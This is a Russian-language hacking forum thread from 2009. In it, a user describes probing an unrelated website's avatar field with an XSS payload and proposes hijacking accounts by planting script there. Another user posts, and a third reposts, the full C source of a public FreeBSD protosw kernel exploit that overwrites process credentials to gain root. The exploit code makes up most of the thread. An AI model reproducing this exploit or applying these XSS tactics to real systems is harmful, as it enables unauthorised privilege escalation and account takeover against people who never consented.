
11.04.2009, 16:24
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от [Raz0r]
мда, по-моему пора предупреждать за глупые ответы на скорую руку (ph1l1ster, mailbrush, DrAssault) и вопросы, причина которым невнимательность (Byrger)
Ответы возможно и на скорую руку, но никак не глупые...
|
|
|

11.04.2009, 17:20
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
непонятка с XSS
---------------------
решил на досуге почитать что это такое.
Прочитал статью чуть выше. Нашел в сети левый сайтик, проверил у него поля ввода аватары на "><script>alert('XSS')</script>, окошко вылетло, радости полные штаны. Сразуже решил удостовериться, попросил знагомого зайти знакомого по сылке (на которой у меня по прежнему вылетает это окошко), знакомый перешл сказал нече нету. Я попросил скинуть код страницы, сделал поиск по XSS, нашел свой скрипт, но он был он был такой
<script>alert('МЮ ЯЮИРЕ НАМЮПСФЕМЮ XSS СЪГБХЛНЯРЭ')</script>
открыл у себя этуже страницу (опять вылетало окошко) посматрел код страницы у меня было написано так как и предпологалось
<script>alert('на сайте обнаружена XSS уязвимость')</script>"
собсно вопрос, а почему у меня нефильтруеться а у других фильтруеться ?
также делал проферку фильтра, на спец знаки, тут он и у меня отфильтровал нормально " и <> и еще чета.
Так почемуж у меня все равно экошко скрипта вылазиет непонятно
|
|
|

11.04.2009, 17:38
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Не совсем моя тема...
Но могу предположить, что многое еще зависит от браузера, под которым чел переходит по ссыли...
Под Internet Explorer (по моему начиная с 7 версии), пассивная XSS не робит....
Последний раз редактировалось farex; 11.04.2009 в 17:47..
|
|
|

11.04.2009, 18:39
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
да нет, с оперы было дело, да я и сам с другого ака проверил, и результат был как и другана, тобишь для всех других идет фильтрация и для моего акка нет.
но нече, если неидет гара к магомеду, магомед взарвет ее  через тоже поле сделал другоую весьч, теперь все работает
------------
и если подумать, то выше описанные нерабочий XSS можно испольщовать к примеру с такой целью.
Получаем доступ к какомуто аккаунту, дописываем у него в настройках в полу аватары нажный нас код и далее этот акк сам того неведая будет работать на нас, выполняя действия записынные в скрипте после каждого обновления транички или переходе на другую. Тож неплохо 
Последний раз редактировалось cupper; 11.04.2009 в 18:46..
|
|
|

11.04.2009, 18:58
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами:
9000055
Репутация:
5
|
|
такой вопрос
Я компилируею сплоит коммандой
gcc sploitname.c –o sploitname только не в netcat а теленето у меня получится это сделать?
error: syntax error before '{' token
gcc sploitname.c -o sploitname.c
ПИшет вот такое
|
|
|

11.04.2009, 19:01
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
С нами:
9229334
Репутация:
125
|
|
Читай исходник сплоита, наверное он из паблика и в коде есть ошибка.
|
|
|

11.04.2009, 19:03
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами:
9680718
Репутация:
118
|
|
это не зависит, через какой клиент ты подключен к серверу и пытаешся, чтото компилировать.
Ошибка в сплойте.
|
|
|

11.04.2009, 19:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
|
|
|

11.04.2009, 19:20
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами:
9000055
Репутация:
5
|
|
Сообщение от Pashkela
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
|
|
|

11.04.2009, 21:33
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
а заключить в код - не судьба не как..?
PHP код:
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
PS - так понимаеш!
Видемо нет......
Тоесть закрыть тегами PHP в квадратных скобках....
что бы людям было удобнее читать код...
Последний раз редактировалось farex; 11.04.2009 в 22:45..
Причина: Показал как
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|